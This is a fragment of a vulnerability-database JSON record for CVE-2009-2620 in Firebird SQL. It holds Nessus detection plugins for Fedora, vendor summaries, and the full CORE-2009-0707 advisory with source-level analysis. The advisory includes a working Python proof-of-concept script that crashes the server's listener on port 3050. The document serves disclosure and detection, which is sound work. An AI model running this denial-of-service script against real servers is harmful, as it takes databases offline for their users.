script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=514463\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/028640.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9f3fbdc4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firebird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firebird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"firebird-2.1.3.18185.0-2.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firebird\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-01T02:26:43", "bulletinFamily": "scanner", "description": "Upgrade from previous package version may be a problem since previous\nversion remove /var/run/firebird and it shouldn", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2009-8317.NASL", "href": "https://www.tenable.com/plugins/nessus/40829", "published": "2009-09-02T00:00:00", "title": "Fedora 10 : firebird-2.1.3.18185.0-2.fc10 (2009-8317)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8317.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40829);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:32:30\");\n\n script_cve_id(\"CVE-2009-2620\");\n script_bugtraq_id(35842);\n script_xref(name:\"FEDORA\", value:\"2009-8317\");\n\n script_name(english:\"Fedora 10 : firebird-2.1.3.18185.0-2.fc10 (2009-8317)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upgrade from previous package version may be a problem since previous\nversion remove /var/run/firebird and it shouldn't This release fix\nthis problem for future updates If you are in that case (no longer\n/var/run/firebird directory after upgrade), just reinstall\nfirebird-2.1.3.18185.0-2 package or create /var/run/firebird owned by\nuser firebird\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=514463\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/028611.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?655b3680\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firebird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firebird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"firebird-2.1.3.18185.0-2.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firebird\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:33", "bulletinFamily": "software", "description": "op_connect_request request with invalid paramters causes server to shutdown listening socket end enter infinite loop.", "modified": "2009-07-29T00:00:00", "published": "2009-07-29T00:00:00", "id": "SECURITYVULNS:VULN:10107", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10107", "title": "Firebird SQL DoS", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\nFirebird SQL op_connect_request main listener shutdown vulnerability\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Firebird SQL op_connect_request main listener shutdown vulnerability\r\nAdvisory ID: CORE-2009-0707\r\nAdvisory URL: http://www.coresecurity.com/content/firebird-sql-dos\r\nDate published: 2009-07-28\r\nDate of last update: 2009-07-28\r\nVendors contacted: Firebird SQL\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Denial of service &#40;DoS&#41;\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: 35842\r\nCVE Name: CVE-2009-2620\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nFirebird SQL [1] is an open source relational database management system\r\noffering many ANSI SQL standard features that runs on Linux, Windows,\r\nand a variety of Unix platforms.\r\n\r\nA remote denial of service vulnerability has been found in Firebird SQL,\r\nwhich can be exploited by a remote attacker to force the server to close\r\nthe socket where it is listening for incoming connections and to enter\r\nan infinite loop, by sending an unexpected &#39;op_connect_request&#39; message\r\nwith invalid data to the server.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . Firebird SQL v1.5.5\r\n . Firebird SQL v2.0.1\r\n . Firebird SQL v2.0.5\r\n . Firebird SQL v2.1.1\r\n . Firebird SQL v2.1.2\r\n . Firebird SQL v2.1.3 RC1\r\n . Firebird SQL v2.5.0 Beta 1\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Firebird SQL v2.1.3 Release Candidate 2 &#40;estimated release: July 2009&#41;\r\n . Firebird SQL v2.5 Beta 2 &#40;estimated release: July 2009&#41;\r\n . Firebird SQL v1.5.6 &#40;estimated release: August 2009&#41;\r\n . Firebird SQL v2.0.6 &#40;estimated release: October 2009&#41;\r\n\r\nPlease build a fresh CVS checkout to have a fixed version sooner.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nThe issue is resolved in all branches of the Firebird SQL repository. It\r\nis registered in the Firebird SQL bug tracker as:\r\nhttp://tracker.firebirdsql.org/browse/CORE-2563\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Francisco Falcon\r\nfrom Core Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. *Introduction*\r\n\r\nFirebird SQL is an open source relational database management system\r\noffering many ANSI SQL standard features that runs on Linux, Windows and\r\na variety of Unix platforms.\r\n\r\nA remote denial of service can be triggered by an unauthenticated\r\nattacker, by sending an unexpected &#39;op_connect_request&#39; message with\r\ninvalid data of length greater than or equal to 12 bytes to the server.\r\n\r\nInside the server &#40;&#39;src/remote/server.cpp&#39;&#41;, the function\r\n&#39;process_packet2&#40;&#41;&#39; processes a packet received from a client. This\r\nfunction has a &#39;switch&#39; statement that considers all the possible\r\nopcodes defined in the protocol &#40;see &#39;P_OP&#39; enum &#39;in\r\nsrc/remote/protocol.h&#39;&#41;.\r\n\r\n/-----------\r\n\r\nsrc/remote/server.cpp:\r\n\r\n...\r\n3404 P_OP op = receive-&gt;p_operation;\r\n3405 switch &#40;op&#41;\r\n3406 {\r\n3407 case op_connect:\r\n ...\r\n3426 case op_compile:\r\n ...\r\n3430 case op_attach:\r\n ...\r\n\r\n- -----------/\r\n\r\n In the case of an &#39;op_connect_request&#39; packet, the execution flow goes\r\nto the following &#39;case&#39; in the &#39;switch&#39; statement:\r\n\r\n/-----------\r\n\r\nsrc/remote/server.cpp:\r\n\r\n...\r\n3584 case op_connect_request:\r\n3585 aux_request&#40;port, &amp;receive-&gt;p_req, sendL&#41;;\r\n3586 break;\r\n\r\n- -----------/\r\n\r\n After calling &#39;aux_request&#40;&#41;&#39; function and executing the &#39;break&#39;\r\nstatement, execution lands here:\r\n\r\n/-----------\r\n\r\nsrc/remote/server.cpp:\r\n\r\n...\r\n3652 if &#40;port &amp;&amp; port-&gt;port_state == state_broken&#41; {\r\n3653 if &#40;!port-&gt;port_parent&#41; {\r\n3654 gds__log&#40;&quot;SERVER/process_packet: broken port, server exiting&quot;&#41;;\r\n3655 port-&gt;disconnect&#40;sendL, receive&#41;;\r\n3656 ThreadData::restoreSpecific&#40;&#41;;\r\n3657 return false;\r\n3658 }\r\n3659 port-&gt;disconnect&#40;sendL, receive&#41;;\r\n3660 port = NULL;\r\n3661 }\r\n\r\n- -----------/\r\n\r\n By debugging the &#39;fbserver.exe&#39; binary when it receives an\r\n&#39;op_connect_request&#39; packet, we can see that the conditions of the first\r\n&#39;if&#39; statement are satisfied, but the condition of the second &#39;if&#39; is\r\nnot, so execution flow goes to the &#39;port-&gt;disconnect&#40;&#41;&#39; call:\r\n\r\n/-----------\r\n\r\n005ACE2C |&gt; 837E 0C 03 CMP DWORD PTR DS:[ESI+C],3\r\n ;port-&gt;port_state == state_broken ?\r\n005ACE30 |. 75 1B JNZ SHORT fbserver.005ACE4D\r\n005ACE32 |. 837E 1C 00 CMP DWORD PTR DS:[ESI+1C],0\r\n ;port-&gt;port_parent == 0?\r\n005ACE36 |. 75 0A JNZ SHORT fbserver.005ACE42\r\n ;this conditional jump is taken\r\n005ACE38 |. 68 D4D65F00 PUSH fbserver.005FD6D4\r\n ; ASCII &quot;SERVER/process_packet: broken port, server exiting&quot;\r\n005ACE3D |.^ E9 44FDFFFF JMP fbserver.005ACB86\r\n005ACE42 |&gt; 53 PUSH EBX\r\n ; /Arg2\r\n005ACE43 |. 57 PUSH EDI\r\n ; |Arg1\r\n005ACE44 |. 8BCE MOV ECX,ESI\r\n ; |\r\n005ACE46 |. E8 65D7FFFF CALL &lt;fbserver.rem_port::disconnect&gt;\r\n ; &#92;port-&gt;disconnect&#40;sendL, receive&#41;\r\n\r\n- -----------/\r\n\r\n The type of &#39;port&#39; is &#39;struct rem_port&#39;, as defined in\r\n&#39;src/remote/remote.h&#39;. This struct type has a &#39;disconnect&#40;&#41;&#39; function\r\nthat is implemented in &#39;src/remote/server.cpp&#39;:\r\n\r\n/-----------\r\n\r\nsrc/remote/server.cpp:\r\n\r\n1464 void rem_port::disconnect&#40;PACKET* sendL, PACKET* receiveL&#41;\r\n\r\n- -----------/\r\n\r\n Inside this function, the following code is executed, in order to free\r\nboth the sent and received packets and to close the corresponding sockets:\r\n\r\n/-----------\r\n\r\nsrc/remote/server.cpp:\r\n\r\n...\r\n1492 REMOTE_free_packet&#40;this, sendL&#41;;\r\n1493 REMOTE_free_packet&#40;this, receiveL&#41;;\r\n1494 this-&gt;disconnect&#40;&#41;;\r\n\r\n- -----------/\r\n\r\n That call to &#39;this-&gt;disconnect&#40;&#41;&#39; will ultimately lead to the\r\n&#39;disconnect&#40;&#41;&#39; function in &#39;src/remote/inet.cpp&#39;. This function is\r\nintended to break a remote connection, and receives a &#39;rem_port&#39;\r\nstructure as parameter.\r\n\r\n/-----------\r\n\r\nsrc/remote/inet.cpp:\r\n\r\n1731 static void disconnect&#40; rem_port* port&#41;\r\n1732 {\r\n\r\n- -----------/\r\n\r\n In the first place, the function closes the connection established by\r\nthe client, by calling the &#39;shutdown&#39; function:\r\n\r\n/-----------\r\n\r\nsrc/remote/inet.cpp:\r\n\r\n...\r\n1763 if &#40;port-&gt;port_handle &amp;&amp; &#40;SOCKET&#41; port-&gt;port_handle !=\r\nINVALID_SOCKET&#41; {\r\n1764 shutdown&#40;&#40;int&#41; port-&gt;port_handle, 2&#41;;\r\n1765 }\r\n\r\n- -----------/\r\n\r\n After that, as a comment line states, if the current &#39;rem_port&#39;\r\nstructure being disconnected is a child of another &#39;rem_port&#39; structure,\r\nit recursively calls &#39;disconnect&#40;&#41;&#39; to disconnect the &#39;rem_port&#39; stored\r\nat &#39;port-&gt;port_async&#39;. &#39;port_async&#39; is a member of &#39;rem_port&#39; struct\r\nthat describes an asynchronous sibling port.\r\n\r\n/-----------\r\n\r\nsrc/remote/inet.cpp:\r\n\r\n/* If this is a sub-port, unlink it from it&#39;s parent */\r\n...\r\n1789 rem_port* parent = port-&gt;port_parent;\r\n1790 if &#40;parent != NULL&#41; {\r\n1791 if &#40;port-&gt;port_async&#41; {\r\n1792 disconnect&#40;port-&gt;port_async&#41;;\r\n1793 port-&gt;port_async = NULL;\r\n1794 }\r\n\r\n- -----------/\r\n\r\n But when that recursive call to &#39;disconnect&#40;&#41;&#39; is made, the\r\n&#39;port-&gt;port_async&#39; passed as parameter to be disconnected corresponds to\r\nthe main server socket, that is, the socket listening for incoming\r\nconnections on port 3050/TCP. Once in the recursive call, &#39;shutdown&#40;&#41;&#39;\r\nand &#39;closesocket&#40;&#41;&#39; functions are invoked, making the server to stop\r\nlistening on the default port 3050/TCP, thus denying the service to\r\nlegitimate users.\r\n\r\n\r\n8.2. *Remarks*\r\n\r\nAs a side effect, the &#39;fbserver.exe&#39; process will enter an infinite\r\nloop, consuming 100&#37; CPU time.\r\n\r\nOn Windows platform, in a default installation, Firebird SQL server is\r\ninstalled as a Windows service, and another service &#40;the Firebird\r\nGuardian&#41; runs together with the server, in order to automatically\r\nrestart the &#39;fbserver.exe&#39; process if it crashes or stops running\r\nabnormally. However, in this case the Firebird Guardian is unable to\r\ndetect the denial of service condition, because the server does not\r\ncrash nor stops running.\r\n\r\nIn Firebird SQL 1.5.5 the behavior is different; the server will crash\r\ninside the &#39;aux_request&#40;&#41;&#39; function in &#39;src/remote/server.cpp&#39; due to a\r\nnull pointer dereference, instead of silently shutting down its listener\r\nport. The problem arises when &#39;port-&gt;port_context&#39; &#40;which has a &#39;NULL&#39;\r\nvalue at this point&#41; is loaded into &#39;rdb&#39; variable and then, at line\r\n&#39;885&#39;, it is used as a pointer without properly checking that it points\r\nto a valid memory address:\r\n\r\n/-----------\r\n\r\nsrc/remote/server.cpp:\r\n\r\n...\r\n884 rdb = port-&gt;port_context;\r\n885 port-&gt;send_response&#40;send, rdb-&gt;rdb_id,\r\n886 send-&gt;p_resp.p_resp_data.cstr_length, status_vector&#41;;\r\n\r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.3. *Proof of concept*\r\n\r\nThe following Python script will trigger the denial of service condition\r\non Firebird SQL, by sending an &#39;op_connect_request&#39; packet with invalid\r\ndata of length greater than or equal to 12 bytes.\r\n\r\n\r\n/-----------\r\n\r\nimport socket\r\nimport time\r\n\r\ndef attack&#40;host, port&#41;:\r\n op_connect_request = &#39;&#92;x35&#39; # Request to establish connection\r\n\r\n packet = &#39;&#92;x00&#92;x00&#92;x00&#39; + op_connect_request\r\n packet += &quot;A&quot; * 12 #Invalid data, must be &gt;= 12 bytes\r\nin order to trigger the DoS\r\n\r\n print &quot;&#40;+&#41; Connecting to the server....&quot;\r\n s = socket.socket&#40;socket.AF_INET, socket.SOCK_STREAM&#41;\r\n s.connect&#40;&#40;host, port&#41;&#41;\r\n print &quot;&#40;+&#41; Sending op_connect_request packet...&quot;\r\n s.send&#40;str&#40;packet&#41;&#41;\r\n s.close&#40;&#41;\r\n print &quot;&#40;+&#41; op_connect_request packet successfully sent.&quot;\r\n\r\n #Wait 10 seconds and try to connect again to Firebird SQL server, to\r\ncheck if it&#39;s down\r\n print &quot;&#40;+&#41; Waiting 10 seconds before trying to reconnect to the\r\nserver...&quot;\r\n time.sleep&#40;10&#41;\r\n\r\n try:\r\n print &quot;&#40;+&#41; Trying to reconnect...&quot;\r\n s = socket.socket&#40;socket.AF_INET, socket.SOCK_STREAM&#41;\r\n s.connect&#40;&#40;host, port&#41;&#41;\r\n s.close&#40;&#41;\r\n print &quot;&#40;!&#41; Something went wrong. The server is still alive.&quot;\r\n except socket.error:\r\n print &quot;&#40;*&#41; Attack successful. The server is down.&quot;\r\n\r\n\r\nport = 3050\r\nhost = &#39;192.168.131.128&#39; #Replace with your target host\r\nattack&#40;host, port&#41;\r\n\r\n- -----------/\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-07-15:\r\nCore Security Technologies notifies the Firebird team of the vulnerability.\r\n\r\n. 2009-07-16:\r\nFirebird team requests technical details in plaintext.\r\n\r\n. 2009-07-16:\r\nCore sends the advisory draft, including technical details.\r\n\r\n. 2009-07-20:\r\nFirebird team notifies that the issue is resolved in all branches of the\r\nFirebird repository [2]. Technical details will be publicly visible when\r\nCore releases its advisory. Firebird team notices that Firebird version\r\n1.5.5 &#40;marked as non vulnerable in the advisory draft&#41; seems to be\r\naffected.\r\n\r\n. 2009-07-27:\r\nCore sends the final version of the advisory to the Firebird team.\r\n\r\n. 2009-07-28:\r\nThe advisory CORE-2009-0707 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] http://www.firebirdsql.org\r\n[2] http://tracker.firebirdsql.org/browse/CORE-2563\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company&#39;s flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright &#40;c&#41; 2009 Core Security\r\nTechnologies and &#40;c&#41; 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.8 &#40;MingW32&#41;\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niEYEARECAAYFAkpvTl0ACgkQyNibggitWa17uQCeMYg7kPSMqmAB1vDNn7Q7xzel\r\n0BYAoJLL6358DsIP9wuSZDxTH3DiUp7Z\r\n=GgTL\r\n-----END PGP SIGNATURE-----", "modified": "2009-07-29T00:00:00", "published": "2009-07-29T00:00:00", "id": "SECURITYVULNS:DOC:22234", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22234", "title": "CORE-2009-0707: Firebird SQL op_connect_request main listener shutdown vulnerability", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "kaspersky": [{"lastseen": "2019-03-21T00:14:22", "bulletinFamily": "info", "description": "### *Detect date*:\n07/29/2009\n\n### *Severity*:\nCritical\n\n### *Description*:\nAn unspecified vulnerability was found in FireBird. By exploiting this vulnerability malicious users can cause denial of service. This vulnerability can be exploited remotely via a specially designed message.\n\n### *Affected products*:\nFireBird SQL 1.5 versions 1.5.5 and earlier \nFireBird SQL 2.0 versions 2.0.5 and earlier \nFireBird SQL 2.1 versions 2.1.2 and earlier \nFireBird SQL 2.5 versions beta 1 and earlier\n\n### *Solution*:\nUpdate to latest version \n[FireBird SQL](<http://www.firebirdsql.org/en/server-packages/>)\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[Firebird](<https://threats.kaspersky.com/en/product/Firebird/>)\n\n### *CVE-IDS*:\n[CVE-2009-2620](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2620>)5.0Critical", "modified": "2019-03-07T00:00:00", "published": "2009-07-29T00:00:00", "id": "KLA10158", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10158", "title": "\r KLA10158DoS vulnerability in FireBird ", "type": "kaspersky", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}]}